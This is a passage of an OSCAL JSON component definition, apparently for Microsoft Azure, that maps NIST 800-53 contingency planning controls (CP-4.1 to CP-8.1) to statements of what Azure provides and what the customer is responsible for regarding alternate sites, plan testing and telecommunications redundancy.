statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1ce9de8d-0316-4fa1-bad1-5921856b3d60","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-4.1","statements":[{"uuid":"2eb00f5e-4d70-4e62-8d27-0fe58705ae68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4.1_smt","by-components":[{"uuid":"7575b75b-4d19-444f-9d75-65a5dfe3160d","export":{"provided":[{"uuid":"5e6f3d56-6d8f-42df-bdf2-53d80cc184f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-025"}],"description":"The Drill Team coordinates contingency plan testing and exercises with the organizational elements relevant to the test, for example, the Incident Management, Crisis Communications, or Site Services teams during regular full region DR Drills. The BCDR team is engaged in analysis and actions based on results._x000D_ _x000D_"}],"responsibilities":[{"uuid":"33c7fc2b-c3f0-4128-9fdd-e9e7c6f00493","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-025"}],"description":"The customer is responsible for coordinating contingency plan testing with the testing of related plans (e.g., business continuity, disaster recovery).","provided-uuid":"5e6f3d56-6d8f-42df-bdf2-53d80cc184f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ee77e745-7498-46ed-a2a1-9965f5a134b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-4.2","statements":[{"uuid":"df959ab1-b38c-47d0-beb5-e638897768e1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-026"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4.2_smt.a","by-components":[{"uuid":"dd8fd03c-9e87-47cf-a707-fbe7f05635b1","export":{"provided":[{"uuid":"38b8d6ca-ef4e-46bd-9546-7dbdbc623957","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-026"}],"description":"All Azure sites have dedicated personnel and equivalent capabilities, ensuring contingency personnel are familiar with the facility and available resources as a part of normal job functions._x000D_ _x000D_"}],"responsibilities":[{"uuid":"2cba4e70-c6f0-412a-ae66-ebe4ec6926ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-026"}],"description":"The customer is responsible for testing the contingency plan at an alternate processing location to familiarize contingency personnel with the facility and resources available at the alternate site. Azure can support contingency testing and provide continued system operation during contingency activities if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region.","provided-uuid":"38b8d6ca-ef4e-46bd-9546-7dbdbc623957"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b110b271-9c1f-4844-b39c-efc011553f70","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4.2_smt.b","by-components":[{"uuid":"8d8eeedb-6140-40ec-b9ab-3d4d903d2da7","export":{"provided":[{"uuid":"0ee645c5-fb4b-4a98-ad57-a5802fcba440","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-027"}],"description":"All Azure sites have dedicated personnel and equivalent capabilities, ensuring contingency personnel are familiar with the facility and available resources as a part of normal job functions._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4fba0474-880a-4eb7-becd-4b13045ed0b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-027"}],"description":"The customer is responsible for testing and evaluating the contingency plan at an alternate processing site to support contingency operations. Azure can support contingency testing and provide continued system operation during contingency activities if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region.","provided-uuid":"0ee645c5-fb4b-4a98-ad57-a5802fcba440"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6fede57f-1804-496d-93cc-82c1b8155600","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-6","statements":[{"uuid":"1da65946-78c5-4b64-8763-5bae82114380","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6_smt.a","by-components":[{"uuid":"c5b5eb7f-cd10-48ec-b40a-b1ccdfa4b445","export":{"provided":[{"uuid":"68adf00c-acc6-41fc-85cd-e2c3d57a101b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-028"}],"description":"Azure establishes alternate storage sites at geographically distributed Azure datacenters, including all agreements to permit storage and retrieval of information. In addition, each Azure service provides the capabilities and guidance for replication of data to alternate storage sites and seamless failover._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9342df85-d00e-4d56-a3f9-80c17b0ca22d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-028"}],"description":"The customer is responsible for establishing an alternate storage site with the ability to store and retrieve backup information, and the agreements permitting such activities. Note: if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region, Azure can support the secure storage and retrieval of system data.","provided-uuid":"68adf00c-acc6-41fc-85cd-e2c3d57a101b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3c3ff1d8-7d05-478f-aa52-aeef12f12288","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6_smt.b","by-components":[{"uuid":"80aa1638-6bb3-4f63-9030-c91835322a46","export":{"provided":[{"uuid":"aa2bc426-b2fc-4995-9625-b1cea5ec74e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-029"}],"description":"All storage sites are Azure datacenters with equivalent security safeguards._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0183e734-859b-48fb-a51f-4026b3ffabfe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-029"}],"description":"The customer is responsible for establishing an alternate storage site with equivalent security safeguards as the primary site. Note: if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region, Azure can support the secure storage and retrieval of system data.","provided-uuid":"aa2bc426-b2fc-4995-9625-b1cea5ec74e0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d527d446-dbd6-4dc6-ab84-21f70169383b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-6.1","statements":[{"uuid":"bfa68529-2309-424a-9255-f33a73b82690","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6.1_smt","by-components":[{"uuid":"eec7c585-65dc-4e16-a4d1-a93d9abf877f","export":{"provided":[{"uuid":"8a926c46-ae19-4114-8b3a-1d608bdd4079","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-030"}],"description":"Alternate storage sites in the form of Azure datacenters are geographically separated so as not to be susceptible to the same threats. The Azure authorization boundary currently consists of fully managed and leased datacenters across geographically separated locations._x000D_ _x000D_"}],"responsibilities":[{"uuid":"feaed42a-fc27-4fc7-9b7f-af9e667d3cb7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-030"}],"description":"The customer is responsible for establishing an alternate storage site that is separate from the primary storage site to reduce its susceptibility to the same threats (e.g., natural disasters). Note: if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region, Azure can support the secure storage and retrieval of system data.","provided-uuid":"8a926c46-ae19-4114-8b3a-1d608bdd4079"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b90664e7-df2b-4090-8295-cad401dfd93b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-6.2","statements":[{"uuid":"dd29f706-0bd0-47ef-97f3-3f974400dbe5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6.2_smt","by-components":[{"uuid":"a8f50328-f982-4d39-ac4f-86248c4e6d4e","export":{"provided":[{"uuid":"6f5d2152-0f71-4bca-a75f-b1f0f5f70ddb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-031"}],"description":"Due to the fully redundant architecture of Azure as described in the BCP and DRP, alternate storage sites in the form of Azure datacenters are designed and implemented to be continuously available. Site availability does not impact the RTO or RPO for any given Azure service due to the redundant architecture._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3a4ee563-26e0-4ed0-8fb6-b15f97194324","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-031"}],"description":"The customer is responsible for establishing an alternate storage site that facilitates recovery operations consistent with customer-defined recovery time objectives (RTO's) and recovery point objectives (RPO's). Azure can support the secure storage and retrieval of system data if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region.","provided-uuid":"6f5d2152-0f71-4bca-a75f-b1f0f5f70ddb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"93fea665-9d0f-4420-a90f-b97d34ba7580","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-6.3","statements":[{"uuid":"e448e07c-37cf-4cd5-9434-5bb1960671d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6.3_smt","by-components":[{"uuid":"b9e3b4cd-d53e-4165-84c2-c2472834e387","export":{"provided":[{"uuid":"2ade4e59-f40b-49c5-ae88-8bf7896ce91d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-032"}],"description":"Azure manages all datacenters and has Emergency Management Teams (EMTs) in place to discuss with all team members any accessibility problems to datacenters in the event of an area-wide disruption or disaster and details explicit mitigation actions. If there is a disruption to any datacenter, Azure personnel from that site do not have to go to another datacenter, as there are Azure personnel already engaged and operating at all sites. An area-wide disruption or disaster at the primary site does not affect the Azure secondary site or sites since they are located in geographically separated regions for each system. Azure personnel are located throughout the United States, and have the capability to work remotely._x000D_ _x000D_"}],"responsibilities":[{"uuid":"66ab5a37-46f3-4e60-b377-c184b9c1287b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-032"}],"description":"The customer is responsible for identifying potential issues and mitigating actions to ensure accessibility to the established alternative storage site during disruption or disaster. Note: if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region, Azure can support the secure storage and retrieval of system data.","provided-uuid":"2ade4e59-f40b-49c5-ae88-8bf7896ce91d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8681bab9-8278-4774-a1ce-c9f0312838d1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7","statements":[{"uuid":"9d5c37fc-b5f2-4f92-b726-04045be83987","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7_smt.a","by-components":[{"uuid":"15614f61-6a05-4fe9-a80b-8c229da097ee","export":{"provided":[{"uuid":"a6d2cc60-15fe-436c-8291-279ad62e7e22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-033"}],"description":"All Azure datacenters can be used as alternate processing sites, and each site has the necessary agreements in place to transfer and resume services logically without equipment transfer. Azure service teams determine recovery objectives following the Business Impact Analysis (BIA) process and services are designed and tested to meet objectives, following the Azure Business Continuity Management (BCM) process."}],"responsibilities":[{"uuid":"32162101-e1d9-4754-892b-18dd7746f2ac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-033"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for establishing an alternate processing site with agreements permitting the transfer and resumption of customer-defined system operations consistent with customer-defined recovery time and recovery point objectives when the primary processing site is unavailable. Note: if the customer configures Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"a6d2cc60-15fe-436c-8291-279ad62e7e22"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cb10c7b7-c9fd-471e-8904-82288e44b2ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7_smt.b","by-components":[{"uuid":"8c09f959-16b1-4d57-836c-e92150674e60","export":{"provided":[{"uuid":"01b6ee83-b1fa-4f25-8e1b-72288fee06c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-034"}],"description":"All Azure datacenters can be used as alternate processing sites, and each site has the necessary agreements in place to transfer and resume services logically without equipment transfer. The BCDR Program in the Azure Global Portal explicitly covers business processes defined during the BIA with Recovery Time Objectives (RTO) and Recovery Point Objectives (RPO) for each service."}],"responsibilities":[{"uuid":"f71167f5-eee0-41d8-8684-345084ae42b4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-034"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for establishing an alternate processing site with the resources and ability to transfer and resume operations within the time period defined in CP-07.a. Note: if the customer configures Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation. Customer and Microsoft Responsibilities Microsoft takes an infrastructure approach to disaster recovery, providing the capabilities required for customers to implement the recovery appropriate for their business. Customers must follow the appropriate guidance to ensure correct implementation of their business continuity solution. For example, to protect Azure Storage data from a region wide disaster storage accounts must be configured to use geo-replication (GRS or RA-GRS).","provided-uuid":"01b6ee83-b1fa-4f25-8e1b-72288fee06c8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b881f552-8002-4031-a801-6bc3ac54613a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7_smt.c","by-components":[{"uuid":"2a92a0ed-2489-4d95-8720-a4c4bf3e3c59","export":{"provided":[{"uuid":"b02d3a16-e3e0-4fe5-9c5f-76e76d3394fd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-035"}],"description":"As Azure datacenters, Azure's alternate data processing sites have equivalent physical and logical security safeguards in place."}],"responsibilities":[{"uuid":"aaeb0d0a-85fa-4fc3-8458-0b3e69b5edd4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-035"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for establishing an alternate processing site that has security safeguards equivalent to the primary site. Note: if the customer configures Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"b02d3a16-e3e0-4fe5-9c5f-76e76d3394fd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"acb96797-64cb-47c9-8537-946998cbe607","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7.1","statements":[{"uuid":"c4a6bb9e-7081-4af7-b038-23057c5acb4b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7.1_smt","by-components":[{"uuid":"6d6dff07-03de-445e-897e-b07e132d31c0","export":{"provided":[{"uuid":"e7acb054-8a82-4e6e-882f-814642d7742b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-036"}],"description":"As Azure datacenters, alternate processing sites are geographically separated so as not to be susceptible to the same threats. The Azure authorization boundary currently consists of fully managed and leased datacenters across geographically separated locations._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8e8f68bb-a41b-467d-8a91-c3dbbbcfd26e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-036"}],"description":"The customer is responsible for establishing an alternative processing site that is separate from the primary processing site to reduce its susceptibility to the same threats (e.g., natural disasters). Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"e7acb054-8a82-4e6e-882f-814642d7742b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0152ce38-81a6-4d0d-b1fd-e4756acd03b8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7.2","statements":[{"uuid":"b3002a1b-0b78-493c-bd87-9e3acdbcd8a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7.2_smt","by-components":[{"uuid":"b48fbb4f-d8b8-4ce0-8e70-b4083419c26f","export":{"provided":[{"uuid":"a5c0a67a-4d57-40d1-b5f4-0ec436239a19","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-037"}],"description":"Azure manages all datacenters and has Emergency Management Teams (EMTs) in place to discuss with all team members any accessibility problems to datacenters in the event of an area-wide disruption or disaster and details explicit mitigation actions. If there is a disruption to any datacenter, Azure personnel from that site do not have to go to another datacenter, as there are Azure personnel already engaged and operating at all sites. An area-wide disruption or disaster at the primary site does not affect the Azure secondary site or sites since they are located in geographically separated regions for each system. Azure personnel are located throughout the United States, and have the capability to work remotely._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e7728061-4cb3-4d0c-88d5-4499bc08f46b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-037"}],"description":"The customer is responsible for identifying issues and mitigating actions to ensure accessibility to the established alternative processing site during disruption or disaster. Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"a5c0a67a-4d57-40d1-b5f4-0ec436239a19"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3ef4d705-9b2a-4867-9199-21bdaa3843b9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7.3","statements":[{"uuid":"dbe154c5-e2d8-4ced-97ef-df0afad459fe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7.3_smt","by-components":[{"uuid":"b3437875-e1eb-4413-ace5-861f00d58624","export":{"provided":[{"uuid":"b08a39a5-8be9-4c62-93a9-c6562959e414","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-038"}],"description":"Azure is located within Azure datacenters. Azure is responsible for managing all alternate processing sites for Azure; therefore, it is not necessary for site agreements to be in place. Priority-of-service provisions are not required because Azure owns and manages or leases all datacenter facilities for Azure._x000D_ _x000D_ Recovery time objectives (RTOs) are established for Azure services and are detailed as part of the BCM process. These RTOs serve as the alternate processing site agreements which determine the priority-of-service provisions for each Azure service._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fe11b0a7-e643-4a52-bdb5-4fbdcb438346","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-038"}],"description":"The customer is responsible for establishing alternate processing site agreements containing priority-of-service provisions which correspond with customer-defined availability requirements (e.g., RTO's). Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"b08a39a5-8be9-4c62-93a9-c6562959e414"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6063cfb0-93d7-49bd-a331-5cd2a2a7f044","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7.4","statements":[{"uuid":"4723d5e2-d1b8-417f-8076-a33ea99ad31c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7.4_smt","by-components":[{"uuid":"db9c1f36-7d04-48c9-8393-a18b82514900","export":{"provided":[{"uuid":"af8cb613-e52e-4e94-b983-43969994125f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-039"}],"description":"Azure deploys services in redundant configurations. Azure datacenters functioning as alternate sites are always ready to be used as operational sites supporting all missions and business functions._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e86a232a-f8af-4c0e-9bfe-8df5854a10ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-039"}],"description":"The customer is responsible for preparing the alternate processing site to be used as the operational site supporting essential missions and business functions. Azure can support the continuation of secure system operation if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region.","provided-uuid":"af8cb613-e52e-4e94-b983-43969994125f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5effc7d1-f7a2-49e7-a800-b8bdeb786149","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8","statements":[{"uuid":"522f2220-51cb-4ccc-89aa-519e9d6530ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-040"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8_smt","by-components":[{"uuid":"4ec1af02-de4b-42af-9962-6abb7a695d69","export":{"provided":[{"uuid":"21e4798e-44b3-4158-9c4c-63358cf79ec6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-040"}],"description":"Azure is responsible for ensuring continuity of its telecommunications services through the process of utilizing diverse fiber routes and redundant hardware to provide maximum availability at each datacenter. Each datacenter represented as part of the Azure boundary is active, independent from all other datacenters, and fully operational with the ability to provide services at any time. Critical problems are defined as incidents or outages, other than caused by an Excused Outage, which cause a Microsoft Equipment failure, as a result of which Microsoft cannot receive any data._x000D_ _x000D_ In addition to the active datacenter configuration, and as an ISP whose purpose is to exclusively host online services, Azure maintains a global fiber backbone comparable to multiple commercial ISPs. Some fiber routes have triple redundancy but all have a minimum of double redundancy. Azure contracts for the fiber paths are dedicated to Microsoft. Microsoft engages and contracts with providers to provide field service maintenance in the event of faults, defects, or failures._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"06f86bde-1e64-4760-8e92-e89e6079bb38","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8.1","statements":[{"uuid":"33d83b75-152f-48b5-bb97-555f65d5e718","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-041"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.1_smt.a","by-components":[{"uuid":"df9bd170-fe87-41ae-a42e-d58cb08c70c9","export":{"provided":[{"uuid":"4033da71-2fdd-4698-b32b-462c6372de37","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-041"}],"description":"Network routing for Azure datacenters is proprietary, and therefore a Service Priority setting for emergency purposes is not required. Azure is responsible for defining its own routing priority based on property availability requirements and emergency purposes. In 